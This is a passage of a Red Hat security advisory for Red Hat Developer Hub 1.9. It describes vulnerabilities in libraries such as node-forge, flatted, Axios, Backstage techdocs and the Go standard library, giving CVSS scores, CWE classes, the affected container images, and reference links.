A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CWE-1333 - Inefficient Regular Expression Complexity

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—

Threats

Impact Moderate

CVE-2026-29063

A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—

Threats

Impact Important

CVE-2026-29074

A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application's failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-776 - Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-29186

A flaw was found in Backstage. The backstage/plugin-techdocs-node package uses an allowlist to filter dangerous MkDocs configuration keys during the documentation build process. A gap in this allowlist allows attackers to craft an mkdocs.yml file that causes arbitrary Python code execution.

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

CWE-791 - Incomplete Filtering of Special Elements

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-32141

A denial of service flaw has been discovered in the flatted npm library. flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-32280

A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—

Threats

Impact Important

CVE-2026-32282

A flaw was found in the internal/syscall/unix package in the Go standard library. If the target of the `Root.Chmod` function is replaced with a symbolic link during execution, specifically after `Root.Chmod` checks the target but before acting, the `chmod` operation will be performed on the file the symbolic link points to. This issue can bypass directory restrictions and lead to unauthorized permission changes on the filesystem.

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround

Threats

Impact Moderate

CVE-2026-33228

A flaw was found in flatted, a JavaScript Object Notation (JSON) parser designed for handling circular data structures. A remote attacker can exploit this vulnerability by providing specially crafted JSON input. The parse() function in flatted fails to properly validate string values used as array index keys, allowing an attacker to manipulate internal JavaScript object prototypes. This prototype pollution can enable an attacker to execute arbitrary code or cause a denial of service, impacting the availability and integrity of affected systems.

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—

Threats

Impact Critical

CVE-2026-33891

A flaw was found in the node-forge library, a JavaScript implementation of Transport Layer Security. This vulnerability, inherited from the bundled jsbn library, allows a remote attacker to cause a Denial of Service (DoS). When the BigInteger.modInverse() function is called with a zero value, it enters an infinite loop, causing the process to hang indefinitely and consume 100% of the CPU resources.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-606 - Unchecked Input for Loop Condition

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-33894

A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-33895

A flaw was found in Forge (also called `node-forge`), a JavaScript library used for Transport Layer Security (TLS). The library's Ed25519 signature verification process does not correctly validate cryptographic signatures, allowing forged non-canonical signatures to be accepted. A remote attacker could exploit this signature malleability to bypass authentication and authorization logic. This vulnerability can also circumvent security checks in applications that rely on the uniqueness of cryptographic signatures for functions such as deduplication or preventing replay attacks.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-33896

A flaw was found in Forge (also known as node-forge), a JavaScript implementation of Transport Layer Security (TLS). The `pki.verifyCertificateChain()` function does not properly enforce certificate validation rules. This oversight allows an intermediate certificate that lacks specific security extensions to enable any leaf certificate to function as a Certificate Authority (CA) and sign other certificates. Consequently, node-forge could accept these unauthorized certificates as valid, potentially leading to spoofing or the issuance of illegitimate certificates.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-295 - Improper Certificate Validation

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-39983

A flaw was found in basic-ftp, an FTP client for Node.js. A remote attacker can exploit this vulnerability by injecting Carriage Return Line Feed (CRLF) sequences into file path parameters used by high-level APIs. This allows the attacker to split a single intended FTP command into multiple commands. Such command injection can lead to the execution of arbitrary commands, potentially compromising the integrity and availability of data or the system.

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-40175

A flaw was found in Axios, a promise-based HTTP client. This vulnerability, known as Prototype Pollution, can be exploited through a specific "Gadget" attack chain. This allows an attacker to escalate a Prototype Pollution vulnerability in a third-party dependency, potentially leading to remote code execution or a full cloud compromise, such as bypassing AWS IMDSv2.

9.0 (Critical)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—

Threats

Impact Important

CVE-2026-40895

A flaw was found in follow-redirects. When an HTTP request follows a cross-domain redirect (a redirection to a different domain), custom authentication headers, such as X-API-Key or X-Auth-Token, are not properly stripped. This allows these sensitive headers to be forwarded verbatim to the redirect target, potentially leading to the unintended disclosure of authentication information to an untrusted third party.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—

Threats

Impact Important

References

202 references

URL	Category
https://access.redhat.com/errata/RHSA-2026:13826	self
https://access.redhat.com/security/cve/CVE-2025-62718	external
https://access.redhat.com/security/cve/CVE-2025-69534	external
https://access.redhat.com/security/cve/CVE-2026-1525	external
https://access.redhat.com/security/cve/CVE-2026-1526	external
https://access.redhat.com/security/cve/CVE-2026-1528	external
https://access.redhat.com/security/cve/CVE-2026-2229	external
https://access.redhat.com/security/cve/CVE-2026-27601	external
https://access.redhat.com/security/cve/CVE-2026-27904	external
https://access.redhat.com/security/cve/CVE-2026-29063	external
https://access.redhat.com/security/cve/CVE-2026-29074	external
https://access.redhat.com/security/cve/CVE-2026-29186	external
https://access.redhat.com/security/cve/CVE-2026-3118	external
https://access.redhat.com/security/cve/CVE-2026-32141	external
https://access.redhat.com/security/cve/CVE-2026-32280	external
https://access.redhat.com/security/cve/CVE-2026-32282	external
https://access.redhat.com/security/cve/CVE-2026-33228	external
https://access.redhat.com/security/cve/CVE-2026-33891	external
https://access.redhat.com/security/cve/CVE-2026-33894	external
https://access.redhat.com/security/cve/CVE-2026-33895	external
https://access.redhat.com/security/cve/CVE-2026-33896	external
https://access.redhat.com/security/cve/CVE-2026-39983	external
https://access.redhat.com/security/cve/CVE-2026-40175	external
https://access.redhat.com/security/cve/CVE-2026-40895	external
https://access.redhat.com/security/cve/CVE-2026-4800	external
https://access.redhat.com/security/cve/CVE-2026-4926	external
https://access.redhat.com/security/updates/classi…	external
https://catalog.redhat.com/search?gs&searchType=c…	external
https://developers.redhat.com/rhdh/overview	external
https://docs.redhat.com/en/documentation/red_hat_…	external
https://issues.redhat.com/browse/RHDHBUGS-2981	external
https://issues.redhat.com/browse/RHDHBUGS-2970	external
https://issues.redhat.com/browse/RHDHBUGS-2967	external
https://issues.redhat.com/browse/RHDHBUGS-2935	external
https://issues.redhat.com/browse/RHDHBUGS-2922	external
https://issues.redhat.com/browse/RHDHBUGS-2920	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2025-62718	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456913	external
https://www.cve.org/CVERecord?id=CVE-2025-62718	external
https://nvd.nist.gov/vuln/detail/CVE-2025-62718	external
https://datatracker.ietf.org/doc/html/rfc1034#sec…	external
https://datatracker.ietf.org/doc/html/rfc3986#sec…	external
https://github.com/axios/axios/commit/fb3befb6daa…	external
https://github.com/axios/axios/pull/10661	external
https://github.com/axios/axios/releases/tag/v1.15.0	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2025-69534	self
https://bugzilla.redhat.com/show_bug.cgi?id=2444839	external
https://www.cve.org/CVERecord?id=CVE-2025-69534	external
https://nvd.nist.gov/vuln/detail/CVE-2025-69534	external
https://github.com/Python-Markdown/markdown	external
https://github.com/Python-Markdown/markdown/actio…	external
https://github.com/Python-Markdown/markdown/issues/1534	external
https://access.redhat.com/security/cve/CVE-2026-1525	self
https://bugzilla.redhat.com/show_bug.cgi?id=2447144	external
https://www.cve.org/CVERecord?id=CVE-2026-1525	external
https://nvd.nist.gov/vuln/detail/CVE-2026-1525	external
https://cna.openjsf.org/security-advisories.html	external
https://cwe.mitre.org/data/definitions/444.html	external
https://github.com/nodejs/undici/security/advisor…	external
https://hackerone.com/reports/3556037	external
https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6	external
https://access.redhat.com/security/cve/CVE-2026-1526	self
https://bugzilla.redhat.com/show_bug.cgi?id=2447142	external
https://www.cve.org/CVERecord?id=CVE-2026-1526	external
https://nvd.nist.gov/vuln/detail/CVE-2026-1526	external
https://datatracker.ietf.org/doc/html/rfc7692	external
https://github.com/nodejs/undici/security/advisor…	external
https://hackerone.com/reports/3481206	external
https://access.redhat.com/security/cve/CVE-2026-1528	self
https://bugzilla.redhat.com/show_bug.cgi?id=2447145	external
https://www.cve.org/CVERecord?id=CVE-2026-1528	external
https://nvd.nist.gov/vuln/detail/CVE-2026-1528	external
https://github.com/nodejs/undici/security/advisor…	external
https://hackerone.com/reports/3537648	external
https://access.redhat.com/security/cve/CVE-2026-2229	self
https://bugzilla.redhat.com/show_bug.cgi?id=2447143	external
https://www.cve.org/CVERecord?id=CVE-2026-2229	external
https://nvd.nist.gov/vuln/detail/CVE-2026-2229	external
https://github.com/nodejs/undici/security/advisor…	external
https://hackerone.com/reports/3487486	external
https://nodejs.org/api/zlib.html#class-zlibinflateraw	external
https://access.redhat.com/security/cve/CVE-2026-3118	self
https://bugzilla.redhat.com/show_bug.cgi?id=2442273	external
https://www.cve.org/CVERecord?id=CVE-2026-3118	external
https://nvd.nist.gov/vuln/detail/CVE-2026-3118	external
https://access.redhat.com/security/cve/CVE-2026-4800	self
https://bugzilla.redhat.com/show_bug.cgi?id=2453496	external
https://www.cve.org/CVERecord?id=CVE-2026-4800	external
https://nvd.nist.gov/vuln/detail/CVE-2026-4800	external
https://github.com/advisories/GHSA-35jh-r3h4-6jhm	external
https://github.com/lodash/lodash/commit/3469357cf…	external
https://access.redhat.com/security/cve/CVE-2026-4926	self
https://bugzilla.redhat.com/show_bug.cgi?id=2451867	external
https://www.cve.org/CVERecord?id=CVE-2026-4926	external
https://nvd.nist.gov/vuln/detail/CVE-2026-4926	external
https://access.redhat.com/security/cve/CVE-2026-27601	self
https://bugzilla.redhat.com/show_bug.cgi?id=2444247	external
https://www.cve.org/CVERecord?id=CVE-2026-27601	external
https://nvd.nist.gov/vuln/detail/CVE-2026-27601	external
https://github.com/jashkenas/underscore/commit/41…	external
https://github.com/jashkenas/underscore/commit/a6…	external
https://github.com/jashkenas/underscore/security/…	external
https://access.redhat.com/security/cve/CVE-2026-27904	self
https://bugzilla.redhat.com/show_bug.cgi?id=2442922	external
https://www.cve.org/CVERecord?id=CVE-2026-27904	external
https://nvd.nist.gov/vuln/detail/CVE-2026-27904	external
https://github.com/isaacs/minimatch/security/advi…	external
https://access.redhat.com/security/cve/CVE-2026-29063	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445291	external
https://www.cve.org/CVERecord?id=CVE-2026-29063	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29063	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/secu…	external
https://access.redhat.com/security/cve/CVE-2026-29074	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445132	external
https://www.cve.org/CVERecord?id=CVE-2026-29074	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29074	external
https://github.com/svg/svgo/security/advisories/G…	external
https://access.redhat.com/security/cve/CVE-2026-29186	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445480	external
https://www.cve.org/CVERecord?id=CVE-2026-29186	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29186	external
https://github.com/backstage/backstage/security/a…	external
https://access.redhat.com/security/cve/CVE-2026-32141	self
https://bugzilla.redhat.com/show_bug.cgi?id=2447083	external
https://www.cve.org/CVERecord?id=CVE-2026-32141	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32141	external
https://github.com/WebReflection/flatted/commit/7…	external
https://github.com/WebReflection/flatted/pull/88	external
https://github.com/WebReflection/flatted/security…	external
https://access.redhat.com/security/cve/CVE-2026-32280	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456339	external
https://www.cve.org/CVERecord?id=CVE-2026-32280	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32280	external
https://go.dev/cl/758320	external
https://go.dev/issue/78282	external
https://groups.google.com/g/golang-announce/c/0uY…	external
https://pkg.go.dev/vuln/GO-2026-4947	external
https://access.redhat.com/security/cve/CVE-2026-32282	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456336	external
https://www.cve.org/CVERecord?id=CVE-2026-32282	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32282	external
https://go.dev/cl/763761	external
https://go.dev/issue/78293	external
https://pkg.go.dev/vuln/GO-2026-4864	external
https://access.redhat.com/security/cve/CVE-2026-33228	self
https://bugzilla.redhat.com/show_bug.cgi?id=2449872	external
https://www.cve.org/CVERecord?id=CVE-2026-33228	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33228	external
https://github.com/WebReflection/flatted/commit/8…	external
https://github.com/WebReflection/flatted/releases…	external
https://github.com/WebReflection/flatted/security…	external
https://access.redhat.com/security/cve/CVE-2026-33891	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452450	external
https://www.cve.org/CVERecord?id=CVE-2026-33891	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33891	external
https://github.com/digitalbazaar/forge/commit/9bb…	external
https://github.com/digitalbazaar/forge/security/a…	external
https://access.redhat.com/security/cve/CVE-2026-33894	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452464	external
https://www.cve.org/CVERecord?id=CVE-2026-33894	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33894	external
https://datatracker.ietf.org/doc/html/rfc2313#section-8	external
https://github.com/digitalbazaar/forge/security/a…	external
https://mailarchive.ietf.org/arch/msg/openpgp/5rn…	external
https://www.rfc-editor.org/rfc/rfc8017.html	external
https://access.redhat.com/security/cve/CVE-2026-33895	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452457	external
https://www.cve.org/CVERecord?id=CVE-2026-33895	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33895	external
https://datatracker.ietf.org/doc/html/rfc8032#sec…	external
https://github.com/digitalbazaar/forge/commit/bde…	external
https://github.com/digitalbazaar/forge/security/a…	external
https://access.redhat.com/security/cve/CVE-2026-33896	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452458	external
https://www.cve.org/CVERecord?id=CVE-2026-33896	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33896	external
https://github.com/digitalbazaar/forge/commit/2e4…	external
https://github.com/digitalbazaar/forge/security/a…	external
https://access.redhat.com/security/cve/CVE-2026-39983	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456971	external
https://www.cve.org/CVERecord?id=CVE-2026-39983	external
https://nvd.nist.gov/vuln/detail/CVE-2026-39983	external
https://github.com/patrickjuchli/basic-ftp/commit…	external
https://github.com/patrickjuchli/basic-ftp/releas…	external
https://github.com/patrickjuchli/basic-ftp/securi…	external
https://access.redhat.com/security/cve/CVE-2026-40175	self
https://bugzilla.redhat.com/show_bug.cgi?id=2457432	external
https://www.cve.org/CVERecord?id=CVE-2026-40175	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40175	external
https://github.com/axios/axios/commit/363185461b9…	external
https://github.com/axios/axios/pull/10660	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-40895	self
https://bugzilla.redhat.com/show_bug.cgi?id=2460297	external
https://www.cve.org/CVERecord?id=CVE-2026-40895	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40895	external
https://github.com/follow-redirects/follow-redire…	external

Acknowledgments

Thibault Guittet

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
